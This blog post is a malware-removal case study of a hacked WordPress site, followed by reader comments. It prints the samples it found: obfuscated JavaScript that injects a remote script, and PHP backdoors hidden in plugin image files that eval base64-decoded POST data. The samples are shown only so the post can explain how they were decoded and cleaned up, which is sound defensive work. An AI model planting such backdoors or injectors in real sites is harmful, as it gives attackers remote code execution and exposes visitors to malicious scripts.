Skip links

Removing Malware from a WordPress blog – Case Study

Updated 20160914

This post is very specific to one type of infection, there are many different types of infections and symptoms, do not be discouraged if the scenario does not fit your situation.

Early this week we were hired to remove some malware from a quite popular web site. The malicious code was there for a little while and the site got blacklisted by google. That’s how the owner noticed it.

Everytime someone tried to visit it (either using Chrome or Firefox) or searched for this site on google, that ugly Report attack Site” message would show up.

Uh-oh, not good for a site owner that makes money with ads and can’t afford losing users. If they had been using our Web-based Integrity monitor, or recognized the early symptoms of a hacked site, that would not have happened, but since they didn’t, now it was time to fix the problem. Remember, no matter what CMS your site runs on, be it WordPress, Joomla, Drupal or something else, we can help fix and prevent malware on your website.

1-Understanding the problem

The first thing we did was to look where and how the code was showing up. We used a simple dump tool to see the source page (lynx is a command-line tool available on most Linux systems):

$lynx –source –dump [siteinquestion]

It shows the whole page source and by analyzing it we saw the following strange javascript (a bit modified to protect the innocent):

(function(){var OgDs=’%’;var FJQr=(‘v_61r_20_61_3d_22Scr_69ptEn_67_69ne_22_2c_62_3d_22_56ers_69on()+_
22_2cj_3d… _64ex_4ff(_22Chrome_22_29_3c0)_26_26(u_2ei_6ede_78_4ff
(_22_57_69_6e_22)_3e0).._3b_7d’).replace(/_/g,OgDs);var NF1=unescape(FJQr);eval(NF1)})();

We also used our site scanner (free) and it confimed that it was indeed malicious.

2-Analyzing the javascript

There are multiple ways to analyze a malicious Javascript, and we chose the easier one. We see that they added an escaped javascript, unescaped and used the function eval to parse the content. I copied over the javascript to a local file and modified the final “eval” function for the “alert” one. Now, instead of executing the code, it will print it.

var a=”ScriptEngine”,b=”Version()+”,j=””,u=navigator.userAgent;if((u.indexOf(“Chrome”)<0)&&(u.indexOf(“Win”)>0)&&(u.indexOf(“NT 6”)<0)&&(document.cookie.indexOf(“miek=1”)<0)&&(typeof(zrvzts)!=typeof(“A”))){zrvzts=”A”;eval(“if(window.”+a+”)j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);document.write(“src=//martu”+”</ script>”);}

So, the unescaped code loads another script from the site After searching a bit, this seems to be an old attack (from mid-2009), that somehow is still running around. The is now unreachable, so the good news is that the attack is not doing anything against the users.

3-Cleaning up WordPress

Once we found what the code was and what it was doing, now it was time to remove it from the site. That’s what we did:

  1. Backup the whole WordPress database (using the Export tool and via an SQL dump)
  2. Back the whole WordPress directory for analysis and removed it from the site
  3. Changed all passwords, unused accounts and services and cleaned up the box
  4. Reinstalled WordPress from scratch (last version), re-imported the database (after checking that it was safe) and reinstalled their theme from scratch (to make sure it was not hacked too).
  5. Worked with Google to get the site removed from their blacklist

4-Analysis of the malware

Once the site was clean and the client happy, we went to do a better analysis of the attack. First, we did a diff between their WordPress version and the original one (they were on version 2.8):

$ diff -r -i –strip-trailing-cr -b -B sitedump/public_html wordPress
Only in sitedump/public_html/wp-content/plugins: multi-level-navigation-plugin1
Only in sitedump/public_html/wp-content/plugins: order-categories
Only in sitedump/public_html/wp-content/plugins: seo-automatic-links
Only in sitedump/public_html/wp-content/plugins: wp-contact-form
Only in sitedump/public_html/wp-content/plugins: wp-db-backup

We also did a diff between the original theme and the one they used and no major changes were found. With that, it was clear to us that the problem was in one of the plugins.

We started by searching for that javascript code in the plugins directory and nothing was returned. That means that the code was probably escaped (hidden) in some way. So we searched for base64_decode or eval (PHP functions generally used by malware authors):

multi-level-navigation-plugin1/images/image.php:< ? php
eval (base64_decode(
yNjkzYTYyNzQ2YzY0NmY3YTY1NzInOw==’)); ?>
multi-level-navigation-plugin1/images/  gifimg.php:< ? php eval base64_decode(“aWY oaXNzZX..zZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw== ; ?>
wp-db-backup/wp-db-backup.php:< ? php if(!function_exists(‘tmp_lkojfghx’)){if(isset($_POST[‘tmp_lkojfghx3’]))eval (
wdCBsYW5ndWFnZT1qYXZhc..2NyaXB0PjwhLS0gCPC9zY3JpcHQ+’));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all(‘#< script(.*?)#is’,$s,$a))foreach($a[0] as $v)if(count(explode(“n”,$v))>5){$e=preg_match(‘#[‘”][^s'”.,;?![]:/
()]{30,}#’,$v)||preg_match(‘#[([](s*d+,){20,}#’,$v);if((preg_match(‘#bevalb#’,$v)&&($e||strpos($v,”fromCharCode’)))||($e&&strpos;($v,’document.write’)))$s=str_replace($v,”,$s);}$s1=preg_replace(‘#< script language=javascript>< !– n(function(.+?n –>#’,”,$s);if(stristr($s,'< body’))$s=preg_replace(‘#(s*< body)#mi’,TMP_XHGFJOKL.’1′,$s1);elseif(($s1!=$s)||stristr($s,’ < /body’)||stristr($s,'< /title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS[‘tmp_xhgfjokl’])call_user_func($GLOBALS[‘tmp_xhgfjokl’]
,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v[‘name’])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(“tmp_lkojfghx’);for($i=0;$

So, these 3 files wp-db-backup/wp-db-backup.php, image.php and gifimg.php had possibly something hidden. To analyze the code, we did the same thing we did with Javascript. We modified the “eval” function for “echo” to see what it was doing. On the wp-db-backup.php we removed the encoded string and decoded it externally using the base64 command line tool:

$ php multi-level-navigation-plugin1/images/ image.php
if(isset($_POST[‘e’]))eval ( base64_decode (
$_POST[“e’]));echo ‘32303d2e34332e3230382e3231323a64696865746172693a62746c646f7a6572′;
$ php multi-level-navigation-plugin1 /images/  gifimg.php
if(isset($_POST[“e’]))eval (base64_decode(

Analysis for the wp-db-backup.php:

echo “PHNjcmlwdCB..pOwogLS0+PC9zY3JpcHQ” | base64 -d
< script language=javascript>>!–
(function(){var OgDs=’%’;var FJQr=(‘v_61r_20_61r_2eu_j_3b_22)_3b_64_6fc_75ment_2e_77_72ite(_22_3cscr
eplace (/_/g,OgDs);var NF1=unescape(FJQr); eval (NF1)})();

So, all of them had a backdoor to allow the attacker to execute any PHP script (and command) they wanted on the box (see eval(POST)) and the wp-db-backup.php had this script to create the malicious javascript on all the pages.

Lessons learned

First, always monitor your systems. If they had a HIDS installed (like the open source OSSEC) it would had detected the modification on those files.

Second, if they had used our Web-based Integrity monitor this problem would be detected way earlier too.

Third: Keep your log files stored longer. Our analysis was not as completed, because we couldn’t go back in time to see when it happened.

Lastly, keep your WordPress updated and use strong passwords! That’s your first line of defense to avoid these problems.

If this scenario did not match your scenario and you require professional support feel free to look into our Website AntiVirus product or check your website via our free Online Security scanner (SiteCheck).

  • How to remove Malware:Trojan, Virus, Worm, spyware, adware or other Malware

  • A very nice write up on how to trouble shoot a setup for clients, I would love to learn more on this subject, keep up the good work.
    Benjamin Straw

  • Thanks! I appreciate the feedback.

  • I would like to thank you for the efforts you have made in writing this article. I am hoping the same best work from you in the future as well. In fact your creative writing abilities has inspired me to start my own BlogEngine blog now. Really the blogging is spreading its wings rapidly. Your write up is a fine example of it.

  • I have this issue with a very large news site. I have no problem with getting a clean install of WP going, but it is finding the triggers that must be in the database I am struggling with.

    The minute I connect the original db to the new install the same problem occurs. This is even occurring on a local install.

  • Chris

    I stumbled onto this site in my search to find help fixing my wordpress based site. I'm not trying to bash you here in your comments section, but I have to be honest and say that it makes me very nervous for my computer's safety, and perhaps even more so to do business with you because when I arrived at this particular page, my Avast AV security pops up for the first time ever since I've had it (got it in the last 2 weeks or so), and says out loud, "Threat has been detected".

    It opens a small notification window that reads:
    avast! Web Shield has blocked a threat.
    No further action is required.
    Action: Connection Aborted
    The threat was detected and blocked while downloading an item from the web.

    Yikes! What is up with this?

    What to do about my site? Ugh…

    • Thanks for the comment Chris. The warning you're receiving is a false positive.

      When we write a post we typically include a sample of what the malicious code may look like (merely showing people what attacked them) just like in the analysis above.


      • Chris

        Thanks for the reply. Please excuse my ignorance–I suck at anything related to computers. At least the AV thing is working good. 🙂 Please feel free to remove these messages if you find that to be appropriate.

        Now, about my site…

        • Chris, no problem and we can appreciate the concern, thank you for bringing up the subject. You can report this to your antivirus provider as a false positive if it alerts you again.

          Can you talk a bit to what problems you're encountering on your site? Feel free to contact us off the blog if you'd prefer:


  • Hi,

    Very Nice article which is help me a lot.

    Thank you.

    My recent post Work with SVN

  • Pingback: Keep your blog from being hacked. | DonnellDesign Blog()

  • hot celebrities

    Very Help ful article, please keep up your work because its keep me updated.

  • Anu

    I have found this malware in our index file. this is found in our school website and would like to fix it ASAP.
    Please could some one tell which fix is the most appropriate for this ?

    Many thanks

  • I got my 35 install multi-wordpress (in my sig) hacked just recently and I had this wp-database plugin on a few of the installs. The php script they used (same php command) infected hundreds of wp files and crm files and I fixed it using a find and replace program. Hopefully, it is this plugin that they used as other than that I am at a loss as to how they gain entrance as ftp, rdp ports are off. Its a windows server that only has one site on it!

  • Pingback: Wordpress – Questo sito potrebbe arrecare danni al tuo computer.()

  • Pingback: Mandatory Security Update: WordPress 3.0.4 | Blogging News, WordPress News, Social Media News from WordCast()

  • footprint20

    Had 6 site in one week lucky no money site but they were all testing in new niche. had all on first page now blacklisted. Now I don’t know what to do? any sugesstions, I guess just move on to some new one. I will keep you in mind for future once I get them tested as a goer site, the I sell after I constructed them. I will be back, so I don’t get compromised. thanks for the info got you bookmarked!

  • Pingback: How to protect your blog from viruses, backdoor Trojans and other nasty stuff —

  • How to check that your database is safe?

  • James

    While using your service I could find positive infection on random peoples websites.

    I could also find the occasional false positive.

    That is why I will not be recommending this service to others until there is a definitive difference in the way you report “potential” infections.

    Guys, there is so much malware out there, why make the false positives look just as menacing as the true positives?

    Other than that. Great product guys.

  • Santhosh1989mpt

    how i rectify blacklisted site

  • office movers los angeles

    We offer
    professional and friendly movers, in competitive prices, With no Hidden Fees,
    our services are reliable and affordable, Call us today 1.800.431.3920 also
    visit our website

  • Habel

    my wordpress blog has the same problem….i have tried removed the malware but my blog is still listed as an attack site…

  • vijay kumar goyal

    Join a linkedin group and get resolve your question.
    tech support group
    we24support – by linkedin

  • Pingback: Tidy-Up Tuesday: Watch your backend()

  • f_monts

    this site contains malware lol! when I open this page, I get a JS.Crypt.BQK (Mutant) in the cache folder of the browser!

  • how to find Malwares on the website and how to remove them and how to make website secure?

    please help.

  • Pingback: » Saturday Link Roundup–”Your Wordpress blog has been hacked” Edition()

  • Pingback: Oh Sh*#! What to Do When Your WordPress Website Has Been Hacked | Elegant Themes Blog()

  • Pingback: My Site Was Hacked: How To Remove Malware From WordPress | The Strategic Blogger()

  • Pingback: What to Do When Your WordPress Website Has Been Hacked()

  • Charles

    Many thanks for this blog post; it was instrumental in finding the malware that infected our WordPress site !

  • Johnny Hurst

    My wordpress site has been taken over and my admin account deleted now I cant get into it. My host restored it to about a month ago but it didn’t do any good I still cant get in. Any one know what I should do?

    • pageii

      First, you need to identify your wordpress version. (1) Go to http://your_url/readme.html. (2) Download a new wordpress installer of the same version. Replace only wp-admin folder. You should also replace wp-include. Now try logging in. I’m assuming you know the basics (e.g backing up your files as mentioned by Daniel Cid).

  • Our website has this “Anal” link to it, I can’t find the codes on the theme that I want to delete.

  • pageii

    Do not discount the possibility of host-level compromise. If your .htaccess file at root folder (public_html) is being modified without your knowledge, consider this issue as one possible scenario.